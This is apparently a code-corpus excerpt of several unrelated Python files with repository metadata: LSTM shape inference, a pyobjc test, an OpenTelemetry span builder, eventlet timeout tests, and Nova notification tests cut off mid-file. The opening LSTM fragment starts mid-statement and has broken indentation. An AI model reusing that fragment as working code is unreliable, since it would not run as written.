'If has_num_directions == True, then node.sequence_dim should be equal 0, but it is {}'.format(
node.sequence_dim)
num_directions = 2 if node.direction in ['bidirectional'] else 1
num_layers = node.num_layers
if node.has_num_directions:
# insert extra dimension to output shape for num_directions
out_shape = shape_insert(out_shape, 1, np.int64(num_directions))
node.out_node(0).shape = out_shape
# extra outputs for hidden/cell states
state_size = shape_array([input_shape[1], node.hidden_size])
if node.has_num_directions:
state_size = shape_insert(state_size, 0, num_directions * num_layers)
        for i in [1, 2]:
            if i not in node.out_nodes():
                data_node = Op._create_data_node(
                    node.graph,
                    name=node.node + '/ExtraOutput/' + str(i),
attrs={'executable': True}
)
node.graph.add_edge(node.id, data_node.id, key=0, out=i)
add_opoutput(node.graph, data_node.id, 0, False)
else:
data_node = node.out_node(i)
data_node.shape = state_size.copy()
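# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original Model Optimizer sources): a
# rough walk-through of how infer() derives the output shapes for a
# hypothetical bidirectional ONNX-style LSTM. All concrete numbers below are
# assumptions chosen only for this example.
#
#   input X shape             = [seq_length, batch_size, input_size]
#                             = [10, 4, 16]       (sequence_dim=0, batch_dim=1)
#   hidden_size               = 128
#   direction                 = 'bidirectional'   -> num_directions = 2
#   num_layers                = 1
#
#   out_shape before insert   = [seq_length, batch_size, hidden_size]
#                             = [10, 4, 128]
#   has_num_directions=True   -> shape_insert(out_shape, 1, num_directions)
#   out_shape                 = [10, 2, 4, 128]
#
#   extra state outputs (ports 1 and 2):
#   state_size before insert  = [input_shape[1], hidden_size] = [4, 128]
#   has_num_directions=True   -> shape_insert(state_size, 0,
#                                             num_directions * num_layers)
#   state_size                = [2, 4, 128]
# ---------------------------------------------------------------------------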
|
14bcaa42fb9231dbb99dac4abbc886f43b7ef376
|
f80ef3a3cf859b13e8af8433af549b6b1043bf6e
|
/pyobjc-framework-Quartz/PyObjCTest/test_civector.py
|
bb5398861c5a7b1a0fd502c3c33815fe4e5d5707
|
[
"MIT"
] |
permissive
|
ronaldoussoren/pyobjc
|
29dc9ca0af838a56105a9ddd62fb38ec415f0b86
|
77b98382e52818690449111cd2e23cd469b53cf5
|
refs/heads/master
| 2023-09-01T05:15:21.814504
| 2023-06-13T20:00:17
| 2023-06-13T20:00:17
| 243,933,900
| 439
| 49
| null | 2023-06-25T02:49:07
| 2020-02-29T08:43:12
|
Python
|
UTF-8
|
Python
| false
| false
| 414
|
py
|
test_civector.py
|
from PyObjCTools.TestSupport import TestCase
import Quartz
class TestCIVector(TestCase):
def testMethods(self):
self.assertArgIsIn(Quartz.CIVector.vectorWithValues_count_, 0)
self.assertArgSizeInArg(Quartz.CIVector.vectorWithValues_count_, 0, 1)
self.assertArgIsIn(Quartz.CIVector.initWithValues_count_, 0)
self.assertArgSizeInArg(Quartz.CIVector.initWithValues_count_, 0, 1)
|
fbf864f7745bb0da4dfc3a3b88de8abdd8ead9c4
|
05643b9b4d20db912c3dbfbc191cadea3143016c
|
/instrumentation/opentelemetry-instrumentation-aio-pika/src/opentelemetry/instrumentation/aio_pika/span_builder.py
|
056f3dab25a950bf02ea4c8d9f2a6672a122d036
|
[
"Apache-2.0"
] |
permissive
|
open-telemetry/opentelemetry-python-contrib
|
35566cd088aa0b23ca977109fcd435ee480784b9
|
0871dd455c0adfa125a2f258a0b55c47a5da5227
|
refs/heads/main
| 2023-08-26T07:30:40.212226
| 2023-08-21T16:42:12
| 2023-08-21T16:42:12
| 220,524,743
| 476
| 401
|
Apache-2.0
| 2023-09-14T21:36:33
| 2019-11-08T18:23:43
|
Python
|
UTF-8
|
Python
| false
| false
| 3,206
|
py
|
span_builder.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from aio_pika.abc import AbstractChannel, AbstractMessage
from opentelemetry.instrumentation.aio_pika.utils import (
is_instrumentation_enabled,
)
from opentelemetry.semconv.trace import (
MessagingOperationValues,
SpanAttributes,
)
from opentelemetry.trace import Span, SpanKind, Tracer
_DEFAULT_ATTRIBUTES = {SpanAttributes.MESSAGING_SYSTEM: "rabbitmq"}
class SpanBuilder:
def __init__(self, tracer: Tracer):
self._tracer = tracer
self._attributes = _DEFAULT_ATTRIBUTES.copy()
self._operation: MessagingOperationValues = None
self._kind: SpanKind = None
self._destination: str = None
def set_as_producer(self):
self._kind = SpanKind.PRODUCER
def set_as_consumer(self):
self._kind = SpanKind.CONSUMER
def set_operation(self, operation: MessagingOperationValues):
self._operation = operation
def set_destination(self, destination: str):
self._destination = destination
self._attributes[SpanAttributes.MESSAGING_DESTINATION] = destination
def set_channel(self, channel: AbstractChannel):
connection = channel.connection
if getattr(connection, "connection", None):
# aio_rmq 7
url = connection.connection.url
else:
# aio_rmq 8
url = connection.url
self._attributes.update(
{
SpanAttributes.NET_PEER_NAME: url.host,
SpanAttributes.NET_PEER_PORT: url.port,
}
)
def set_message(self, message: AbstractMessage):
properties = message.properties
if properties.message_id:
self._attributes[
SpanAttributes.MESSAGING_MESSAGE_ID
] = properties.message_id
if properties.correlation_id:
self._attributes[
SpanAttributes.MESSAGING_CONVERSATION_ID
] = properties.correlation_id
def build(self) -> Optional[Span]:
if not is_instrumentation_enabled():
return None
if self._operation:
self._attributes[SpanAttributes.MESSAGING_OPERATION] = self._operation.value
else:
self._attributes[SpanAttributes.MESSAGING_TEMP_DESTINATION] = True
span = self._tracer.start_span(
self._generate_span_name(), kind=self._kind, attributes=self._attributes
)
return span
def _generate_span_name(self) -> str:
operation_value = self._operation.value if self._operation else "send"
return f"{self._destination} {operation_value}"
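# ---------------------------------------------------------------------------
# Usage sketch (illustrative only; not part of the instrumentation module).
# It shows roughly how a publish path could drive the builder; `tracer`,
# `exchange_name`, `channel` and `message` are assumed to be supplied by the
# caller, and `trace.use_span` comes from the opentelemetry API.
#
#   builder = SpanBuilder(tracer)
#   builder.set_as_producer()
#   builder.set_destination(exchange_name)  # sets messaging.destination
#   builder.set_channel(channel)            # sets net.peer.name / net.peer.port
#   builder.set_message(message)            # sets message id / correlation id
#   span = builder.build()                  # None when instrumentation is off
#   if span is not None:
#       with trace.use_span(span, end_on_exit=True):
#           ...  # perform the actual publish
# ---------------------------------------------------------------------------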
|
d852302bfef7da09c408f4b456855cd38ae1247b
|
11cd362cdd78c2fc48042ed203614b201ac94aa6
|
/desktop/core/ext-py3/eventlet-0.30.2/tests/timeout_test_with_statement.py
|
cd452a26e679bbb482715c0a5942c51f0d0e4498
|
[
"MIT",
"CC-BY-3.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"ZPL-2.0",
"Unlicense",
"LGPL-3.0-only",
"CC0-1.0",
"LicenseRef-scancode-other-permissive",
"CNRI-Python",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-or-later",
"Python-2.0",
"GPL-3.0-only",
"CC-BY-4.0",
"LicenseRef-scancode-jpython-1.1",
"AFL-2.1",
"JSON",
"WTFPL",
"LicenseRef-scancode-generic-exception",
"LicenseRef-scancode-jython",
"GPL-3.0-or-later",
"LicenseRef-scancode-python-cwi",
"BSD-3-Clause",
"LGPL-3.0-or-later",
"Zlib",
"LicenseRef-scancode-free-unknown",
"Classpath-exception-2.0",
"LicenseRef-scancode-proprietary-license",
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"MPL-2.0",
"ISC",
"GPL-2.0-only",
"ZPL-2.1",
"BSL-1.0",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-public-domain",
"Xnet",
"BSD-2-Clause"
] |
permissive
|
cloudera/hue
|
b42343d0e03d2936b5a9a32f8ddb3e9c5c80c908
|
dccb9467675c67b9c3399fc76c5de6d31bfb8255
|
refs/heads/master
| 2023-08-31T06:49:25.724501
| 2023-08-28T20:45:00
| 2023-08-28T20:45:00
| 732,593
| 5,655
| 2,244
|
Apache-2.0
| 2023-09-14T03:05:41
| 2010-06-21T19:46:51
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 4,136
|
py
|
timeout_test_with_statement.py
|
"""Tests with-statement behavior of Timeout class."""
import gc
import sys
import time
import weakref
from eventlet import sleep
from eventlet.timeout import Timeout
from tests import LimitedTestCase
DELAY = 0.01
class Error(Exception):
pass
class Test(LimitedTestCase):
def test_cancellation(self):
# Nothing happens if with-block finishes before the timeout expires
t = Timeout(DELAY * 2)
sleep(0) # make it pending
assert t.pending, repr(t)
with t:
assert t.pending, repr(t)
sleep(DELAY)
# check if timer was actually cancelled
assert not t.pending, repr(t)
sleep(DELAY * 2)
def test_raising_self(self):
# An exception will be raised if it's not
try:
with Timeout(DELAY) as t:
sleep(DELAY * 2)
except Timeout as ex:
assert ex is t, (ex, t)
else:
raise AssertionError('must raise Timeout')
def test_raising_self_true(self):
# specifying True as the exception raises self as well
try:
with Timeout(DELAY, True) as t:
sleep(DELAY * 2)
except Timeout as ex:
assert ex is t, (ex, t)
else:
raise AssertionError('must raise Timeout')
def test_raising_custom_exception(self):
# You can customize the exception raised:
try:
with Timeout(DELAY, IOError("Operation takes way too long")):
sleep(DELAY * 2)
except IOError as ex:
assert str(ex) == "Operation takes way too long", repr(ex)
def test_raising_exception_class(self):
# Providing classes instead of values should be possible too:
try:
with Timeout(DELAY, ValueError):
sleep(DELAY * 2)
except ValueError:
pass
def test_raising_exc_tuple(self):
try:
1 // 0
except:
try:
with Timeout(DELAY, sys.exc_info()[0]):
sleep(DELAY * 2)
raise AssertionError('should not get there')
raise AssertionError('should not get there')
except ZeroDivisionError:
pass
else:
raise AssertionError('should not get there')
def test_cancel_timer_inside_block(self):
# It's possible to cancel the timer inside the block:
with Timeout(DELAY) as timer:
timer.cancel()
sleep(DELAY * 2)
def test_silent_block(self):
# To silence the exception before exiting the block, pass
# False as second parameter.
XDELAY = 0.1
start = time.time()
with Timeout(XDELAY, False):
sleep(XDELAY * 2)
delta = (time.time() - start)
assert delta < XDELAY * 2, delta
def test_dummy_timer(self):
# passing None as seconds disables the timer
with Timeout(None):
sleep(DELAY)
sleep(DELAY)
def test_ref(self):
err = Error()
err_ref = weakref.ref(err)
with Timeout(DELAY * 2, err):
sleep(DELAY)
del err
gc.collect()
assert not err_ref(), repr(err_ref())
def test_nested_timeout(self):
with Timeout(DELAY, False):
with Timeout(DELAY * 2, False):
sleep(DELAY * 3)
raise AssertionError('should not get there')
with Timeout(DELAY) as t1:
with Timeout(DELAY * 2) as t2:
try:
sleep(DELAY * 3)
except Timeout as ex:
assert ex is t1, (ex, t1)
assert not t1.pending, t1
assert t2.pending, t2
assert not t2.pending, t2
with Timeout(DELAY * 2) as t1:
with Timeout(DELAY) as t2:
try:
sleep(DELAY * 3)
except Timeout as ex:
assert ex is t2, (ex, t2)
assert t1.pending, t1
assert not t2.pending, t2
assert not t1.pending, t1
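# ---------------------------------------------------------------------------
# Summary sketch (illustrative only; not one of the test cases above; MyError
# is a placeholder exception). The with-statement patterns exercised by this
# module boil down to:
#
#   with Timeout(seconds):              # raises the Timeout instance itself
#       ...
#
#   with Timeout(seconds, MyError()):   # raises the given exception instead
#       ...
#
#   with Timeout(seconds, False):       # silently aborts the block
#       ...
#
#   with Timeout(None):                 # timer disabled, never fires
#       ...
# ---------------------------------------------------------------------------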
|
d0e9de82c3c634251a9365710a3515ef5c9e5414
|
84724b34b3f1e84dc53cbca5f3660590dbc34a9f
|
/nova/tests/functional/notification_sample_tests/test_instance.py
|
1db77b91ddf295af4cea3138384fc87de2a92cb4
|
[
"Apache-2.0"
] |
permissive
|
openstack/nova
|
2c24b64e3677595611715bae6dda14edd3f90a24
|
065c5906d2da3e2bb6eeb3a7a15d4cd8d98b35e9
|
refs/heads/master
| 2023-08-28T15:10:05.126314
| 2023-08-25T20:31:27
| 2023-08-25T20:31:27
| 790,031
| 2,287
| 2,320
|
Apache-2.0
| 2023-07-08T02:10:29
| 2010-07-22T02:04:27
|
Python
|
UTF-8
|
Python
| false
| false
| 85,580
|
py
|
test_instance.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from unittest import mock
from nova import exception
from nova.tests import fixtures
from nova.tests.functional.api import client
from nova.tests.functional.notification_sample_tests \
import notification_sample_base
from nova.volume import cinder
class TestInstanceNotificationSampleWithMultipleCompute(
notification_sample_base.NotificationSampleTestBase):
def setUp(self):
self.flags(compute_driver='fake.FakeLiveMigrateDriver')
self.flags(bdms_in_notifications='True', group='notifications')
super(TestInstanceNotificationSampleWithMultipleCompute, self).setUp()
self.neutron = fixtures.NeutronFixture(self)
self.useFixture(self.neutron)
self.cinder = fixtures.CinderFixture(self)
self.useFixture(self.cinder)
self.useFixture(fixtures.AllServicesCurrent())
def test_multiple_compute_actions(self):
# There are not going to be real network-vif-plugged events coming
# so don't wait for them.
self.flags(live_migration_wait_for_vif_plug=False, group='compute')
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._wait_for_notification('instance.create.end')
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
# server will boot on the 'compute' host
self.compute2 = self.start_service('compute', host='host2')
actions = [
(self._test_live_migration_rollback, 'ACTIVE'),
(self._test_live_migration_abort, 'ACTIVE'),
(self._test_live_migration_success, 'ACTIVE'),
(self._test_evacuate_server, 'SHUTOFF'),
(self._test_live_migration_force_complete, 'ACTIVE'),
]
for action, expected_state in actions:
self.notifier.reset()
action(server)
# Ensure that instance is in active state after an action
self._wait_for_state_change(server, expected_state)
@mock.patch('nova.compute.manager.ComputeManager.'
'_live_migration_cleanup_flags', return_value=[True, False])
@mock.patch('nova.compute.rpcapi.ComputeAPI.pre_live_migration',
side_effect=exception.DestinationDiskExists(path='path'))
def _test_live_migration_rollback(self, server, mock_migration,
mock_flags):
post = {
'os-migrateLive': {
'host': 'host2',
'block_migration': True,
}
}
self.admin_api.post_server_action(server['id'], post)
self._wait_for_notification(
'instance.live_migration_rollback_dest.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_rollback.start
# 3. instance.live_migration_rollback.end
# 4. instance.live_migration_rollback_dest.start
# 5. instance.live_migration_rollback_dest.end
self.assertEqual(6, len(self.notifier.versioned_notifications),
[x['event_type'] for x in
self.notifier.versioned_notifications])
self._verify_notification(
'instance-live_migration_rollback-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-live_migration_rollback-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self._verify_notification(
'instance-live_migration_rollback_dest-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-live_migration_rollback_dest-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
def _test_live_migration_success(self, server):
post = {
'os-migrateLive': {
'host': 'host2',
'block_migration': True,
}
}
self.admin_api.post_server_action(server['id'], post)
self._wait_for_notification('instance.live_migration_pre.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_pre.start
# 3. instance.live_migration_pre.end
self.assertEqual(4, len(self.notifier.versioned_notifications),
[x['event_type'] for x in
self.notifier.versioned_notifications])
self._verify_notification(
'instance-live_migration_pre-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-live_migration_pre-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
migrations = self.admin_api.get_active_migrations(server['id'])
self.assertEqual(1, len(migrations))
self._wait_for_notification('instance.live_migration_post.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_pre.start
# 3. instance.live_migration_pre.end
# 4. instance.live_migration_post.start
# 5. instance.live_migration_post_dest.start
# 6. instance.live_migration_post_dest.end
# 7. instance.live_migration_post.end
self.assertEqual(8, len(self.notifier.versioned_notifications),
[x['event_type'] for x in
self.notifier.versioned_notifications])
self._verify_notification(
'instance-live_migration_post-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-live_migration_post_dest-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
self._verify_notification(
'instance-live_migration_post_dest-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[6])
self._verify_notification(
'instance-live_migration_post-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[7])
def _test_live_migration_abort(self, server):
post = {
"os-migrateLive": {
"host": "host2",
"block_migration": False,
}
}
self.admin_api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'MIGRATING')
migrations = self._wait_and_get_migrations(server)
self.admin_api.delete_migration(server['id'], migrations[0]['id'])
self._wait_for_notification('instance.live_migration_abort.start')
self._wait_for_state_change(server, 'ACTIVE')
        # NOTE(gibi): the instance.live_migration_rollback notification is
        # emitted after the instance.live_migration_abort notification so we
        # have to wait for the rollback to ensure we can assert both
        # notifications below
self._wait_for_notification('instance.live_migration_rollback.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_pre.start
# 3. instance.live_migration_pre.end
# 4. instance.live_migration_abort.start
# 5. instance.live_migration_abort.end
# 6. instance.live_migration_rollback.start
# 7. instance.live_migration_rollback.end
self.assertEqual(8, len(self.notifier.versioned_notifications),
[x['event_type'] for x in
self.notifier.versioned_notifications])
self._verify_notification(
'instance-live_migration_pre-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-live_migration_pre-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self._verify_notification(
'instance-live_migration_abort-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-live_migration_abort-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
self._verify_notification(
'instance-live_migration_rollback-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[6])
self._verify_notification(
'instance-live_migration_rollback-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[7])
def _test_evacuate_server(self, server):
services = self.admin_api.get_services(host='host2',
binary='nova-compute')
service_id = services[0]['id']
self.compute2.stop()
self.admin_api.put_service(service_id, {'forced_down': True})
post_args = {
"host": "compute"
}
self._evacuate_server(
server, extra_post_args=post_args, expected_host='compute')
notifications = self._get_notifications('instance.evacuate')
self.assertEqual(1, len(notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-evacuate',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=notifications[0])
self.compute2.start()
self._wait_for_migration_status(server, ['completed'])
self.admin_api.put_service(service_id, {'forced_down': False})
def _test_live_migration_force_complete(self, server):
        # In this scenario an evacuate happened before, which stopped the
        # server.
self._start_server(server)
self._wait_for_state_change(server, 'ACTIVE')
self.notifier.reset()
post = {
'os-migrateLive': {
'host': 'host2',
'block_migration': True,
}
}
self.admin_api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'MIGRATING')
migrations = self._wait_and_get_migrations(server)
migration_id = migrations[0]['id']
self.admin_api.force_complete_migration(server['id'], migration_id)
# Note that we wait for instance.live_migration_force_complete.end but
# by the time we check versioned notifications received we could have
# entered ComputeManager._post_live_migration which could emit up to
# four other notifications:
# - instance.live_migration_post.start
# - instance.live_migration_post_dest.start
# - instance.live_migration_post_dest.end
# - instance.live_migration_post.end
# We are not concerned about those in this test so that's why we stop
# once we get instance.live_migration_force_complete.end and assert
# we got at least 6 notifications.
self._wait_for_notification(
'instance.live_migration_force_complete.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_pre.start
# 3. instance.live_migration_pre.end
# 4. instance.live_migration_force_complete.start
# 5. instance.live_migration_force_complete.end
self.assertGreaterEqual(len(self.notifier.versioned_notifications), 6,
self.notifier.versioned_notifications)
self._verify_notification(
'instance-live_migration_force_complete-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-live_migration_force_complete-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
class TestInstanceNotificationSample(
notification_sample_base.NotificationSampleTestBase):
def setUp(self):
self.flags(bdms_in_notifications='True', group='notifications')
super(TestInstanceNotificationSample, self).setUp()
self.neutron = fixtures.NeutronFixture(self)
self.useFixture(self.neutron)
self.cinder = fixtures.CinderFixture(self)
self.useFixture(self.cinder)
def _wait_until_swap_volume(self, server, volume_id):
for i in range(50):
volume_attachments = self.api.get_server_volumes(server['id'])
if len(volume_attachments) > 0:
for volume_attachment in volume_attachments:
if volume_attachment['volumeId'] == volume_id:
return
time.sleep(0.5)
self.fail('Volume swap operation failed.')
def test_instance_action(self):
# A single test case is used to test most of the instance action
# notifications to avoid booting up an instance for every action
# separately.
# Every instance action test function shall make sure that after the
# function the instance is in active state and usable by other actions.
        # Therefore some actions, especially delete, cannot be used here, as
        # recovering from them would mean recreating the instance, which
        # would go against the whole purpose of this optimization.
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
actions = [
self._test_power_off_on_server,
self._test_restore_server,
self._test_suspend_resume_server,
self._test_pause_unpause_server,
self._test_shelve_and_shelve_offload_server,
self._test_unshelve_server,
self._test_resize_and_revert_server,
self._test_snapshot_server,
self._test_reboot_server,
self._test_reboot_server_error,
self._test_trigger_crash_dump,
self._test_volume_detach_attach_server,
self._test_rescue_unrescue_server,
self._test_soft_delete_server,
self._test_attach_volume_error,
self._test_interface_attach_and_detach,
self._test_interface_attach_error,
self._test_lock_unlock_instance,
self._test_lock_unlock_instance_with_reason,
]
for action in actions:
self.notifier.reset()
action(server)
# Ensure that instance is in active state after an action
self._wait_for_state_change(server, 'ACTIVE')
            # if the test step did not raise then we consider the step as
# succeeded. We drop the logs to avoid causing subunit parser
# errors due to logging too much at the end of the test case.
self.stdlog.delete_stored_logs()
def test_create_delete_server(self):
fake_trusted_certs = ['cert-id-1', 'cert-id-2']
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}],
'tags': ['tag'],
'trusted_image_certificates': fake_trusted_certs})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self._delete_server(server)
        # NOTE(gibi): The wait_until_deleted() call polls the REST API to see
        # if the instance has disappeared; however the _delete_instance() in
        # compute/manager destroys the instance first and then sends the
        # instance.delete.end notification. So to avoid a race condition the
        # test needs to wait for the notification as well here.
self._wait_for_notification('instance.delete.end')
self.assertEqual(9, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
# This list needs to be in order.
expected_notifications = [
'instance-create-start',
'instance-create-end',
'instance-update-tags-action',
'instance-volume_attach-start',
'instance-volume_attach-end',
'instance-delete-start',
'instance-shutdown-start',
'instance-shutdown-end',
'instance-delete-end'
]
for idx, notification in enumerate(expected_notifications):
self._verify_notification(
notification,
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[idx])
@mock.patch('nova.compute.manager.ComputeManager._build_resources')
def test_create_server_error(self, mock_build):
def _build_resources(*args, **kwargs):
raise exception.FlavorDiskTooSmall()
mock_build.side_effect = _build_resources
fake_trusted_certs = ['cert-id-1', 'cert-id-2']
server = self._boot_a_server(
expected_status='ERROR',
extra_params={'networks': [{'port': self.neutron.port_1['id']}],
'tags': ['tag'],
'trusted_image_certificates': fake_trusted_certs})
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance-create-start
# 3. instance-create-error
self.assertEqual(4, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
tb = self.notifier.versioned_notifications[3]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn('raise exception.FlavorDiskTooSmall()', tb)
self._verify_notification(
'instance-create-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-create-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[3])
self.notifier.reset()
self._delete_server(server)
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-delete-start_not_scheduled',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-delete-end_not_scheduled',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def test_instance_exists_usage_audit(self):
# TODO(xavvior): Should create a functional test for the
# "instance_usage_audit" periodic task. We didn't find usable
# solution for this problem, however we tried to test it in
# several ways.
pass
def test_instance_exists(self):
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.notifier.reset()
post = {
'rebuild': {
'imageRef': 'a2459075-d96c-40d5-893e-577ff92e721c',
'metadata': {}
}
}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, expected_status='REBUILD')
self._wait_for_state_change(server, expected_status='ACTIVE')
notifications = self._get_notifications('instance.exists')
self._verify_notification(
'instance-exists',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']
},
actual=notifications[0])
def test_delete_server_while_compute_is_down(self):
server = self._boot_a_server(
expected_status='ACTIVE',
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
service_id = self.api.get_service_id('nova-compute')
self.admin_api.put_service_force_down(service_id, True)
self.notifier.reset()
self._delete_server(server)
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-delete-start_compute_down',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-delete-end_compute_down',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.admin_api.put_service_force_down(service_id, False)
def _verify_instance_update_steps(self, steps, notifications,
initial=None):
replacements = {}
if initial:
replacements = initial
for i, step in enumerate(steps):
replacements.update(step)
self._verify_notification(
'instance-update',
replacements=replacements,
actual=notifications[i])
return replacements
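    # Illustrative note (not part of the original test code): the steps passed
    # to _verify_instance_update_steps are cumulative -- each step lists only
    # the fields that changed, and `replacements` carries everything seen so
    # far forward to the next notification. A hypothetical two-step sequence
    # would be matched like this:
    #
    #   steps = [
    #       {'state': 'building', 'task_state': 'scheduling'},  # notification 0
    #       {'task_state': None},                                # notification 1
    #   ]
    #   # notification 1 is verified against
    #   # {'state': 'building', 'task_state': None}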
def test_create_delete_server_with_instance_update(self):
# This makes server network creation synchronous which is necessary
# for notification samples that expect instance.info_cache.network_info
# to be set.
self.useFixture(fixtures.SpawnIsSynchronousFixture())
self.flags(notify_on_state_change='vm_and_task_state',
group='notifications')
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
instance_updates = self._wait_for_notifications('instance.update', 8)
        # The first notification comes from nova-conductor, the eighth
        # notification comes from nova-api, and the rest are from
        # nova-compute. To keep the test simpler, assert this fact and then
        # modify the publisher_id of the first and eighth notifications to
        # match the template.
self.assertEqual('nova-conductor:fake-mini',
instance_updates[0]['publisher_id'])
self.assertEqual('nova-api:fake-mini',
instance_updates[7]['publisher_id'])
instance_updates[0]['publisher_id'] = 'nova-compute:fake-mini'
instance_updates[7]['publisher_id'] = 'nova-compute:fake-mini'
create_steps = [
# nothing -> scheduling
{'reservation_id': server['reservation_id'],
'uuid': server['id'],
'host': None,
'node': None,
'state_update.new_task_state': 'scheduling',
'state_update.old_task_state': 'scheduling',
'state_update.state': 'building',
'state_update.old_state': 'building',
'state': 'building'},
# scheduling -> building
{
'state_update.new_task_state': None,
'state_update.old_task_state': 'scheduling',
'task_state': None},
# scheduled
{'host': 'compute',
'node': 'fake-mini',
'state_update.old_task_state': None,
'updated_at': '2012-10-29T13:42:11Z'},
# building -> networking
{'state_update.new_task_state': 'networking',
'state_update.old_task_state': 'networking',
'task_state': 'networking'},
# networking -> block_device_mapping
{'state_update.new_task_state': 'block_device_mapping',
'state_update.old_task_state': 'networking',
'task_state': 'block_device_mapping',
'ip_addresses': [{
"nova_object.name": "IpPayload",
"nova_object.namespace": "nova",
